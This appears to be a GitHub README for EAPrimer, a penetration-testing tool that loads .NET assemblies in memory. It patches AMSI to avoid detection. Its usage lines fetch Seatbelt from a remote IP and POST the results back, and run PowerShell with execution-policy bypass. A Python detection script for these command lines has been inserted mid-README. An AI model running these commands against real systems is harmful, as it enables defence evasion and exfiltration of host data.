C# project to reflectively load .NET assemblies in memory
https://github.com/m8sec/eaprimer

amsi csharp executing-assemblies exploit net-assemblies pentesting powershell windows


# EAPrimer

EAPrimer can be used to load .NET assemblies from a file path or URL. On startup, it attempts to patch AMSI in memory to bypass detection. By default, output is written to the console; it can instead be directed to a file or sent via HTTP POST request to a remote server.

The latest, compiled version of the code is available here.

#### Usage:
Execute remote file with arguments and send output to server:
```text
EAPrimer.exe -path=https://192.168.1.2/Seatbelt.exe -post=https://192.168.1.2 -args="-group=all"
```

Execute local file with arguments and write output to file:
```text
EAPrimer.exe -path=.\Seatbelt.exe -post=results.txt -args="-group=all"
```
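
A detection-side sketch for the command-line shape in the usage lines above, added here and not part of the EAPrimer project: it scores process-creation command lines by their `-path=`/`-post=`/`-args=` flags rather than by image name. The sample events, scoring weights and function names are constructed for illustration.

```python
import re

# Flag names come from the README usage lines. A rebuilt copy can rename them,
# so treat this as one signal alongside AMSI and .NET assembly-load telemetry.
FLAG_RE = re.compile(r'(?<!\S)-(path|post|args)=("[^"]*"|\S+)', re.IGNORECASE)
URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def parse_flags(cmdline):
    """Extract -path=, -post= and -args= values, wherever they appear."""
    return {m.group(1).lower(): m.group(2).strip('"')
            for m in FLAG_RE.finditer(cmdline)}


def assess(cmdline):
    """Return (score, reasons); score 0 means the line lacks the loader shape."""
    flags = parse_flags(cmdline)
    if "path" not in flags or not (flags.keys() & {"post", "args"}):
        return 0, []
    score, reasons = 1, ["-path= combined with -post=/-args="]
    if URL_RE.match(flags["path"]):
        score += 2
        reasons.append("assembly fetched over HTTP(S): " + flags["path"])
    post = flags.get("post", "")
    if URL_RE.match(post):
        score += 2
        reasons.append("output POSTed to: " + post)
    elif post:
        reasons.append("output written to file: " + post)
    return score, reasons


# Constructed process-creation command lines (e.g. from Sysmon Event ID 1 or
# Windows Event 4688). The image name is varied because a file can be renamed.
SAMPLE_EVENTS = [
    r'C:\Users\Public\svc.exe -path=https://192.168.1.2/Seatbelt.exe -post=https://192.168.1.2 -args="-group=all"',
    r'C:\Temp\EAPrimer.exe -path=.\Seatbelt.exe -post=results.txt -args="-group=all"',
    r'C:\Tools\backup.exe -path=D:\data',
    r'C:\Windows\System32\robocopy.exe C:\src D:\dst /E',
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        score, reasons = assess(line)
        if score:
            print(f"score={score} {line}")
            for reason in reasons:
                print("   -", reason)
```

A lone `-path=` argument is common in benign tools, which is why the third sample scores 0; the remote-fetch and HTTP POST cases score highest.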

## Invoke-EAPrimer.ps1
EAPrimer.exe was written mainly to act as a support, or "Primer", for executing assemblies, ultimately allowing for an "execute_assembly" module in pentest frameworks such as ActiveReign and CrackMapExec. The PowerShell script allows for added flexibility to create these modules.

> ⚠️ Alternate methods have since been used to more efficiently load .NET assemblies in memory. However, I have kept this file in the repo as an additional PoC.

#### Usage:
```powershell
powershell -exec bypass
Import-Module .\Invoke-EAPrimer.ps1
Invoke-EAPrimer -Path .\Seatbelt.exe -Args -group=all
```

## Credit
This was one of my first deep dives into C# and much of the heavy lifting was already done by these guys:
* Flangvik - NetLoader
* _RastaMouse - AMSI Bypass

## Notes
* Built with .NET 4.0
* Check out SharpCollection for hosted payloads to test it out!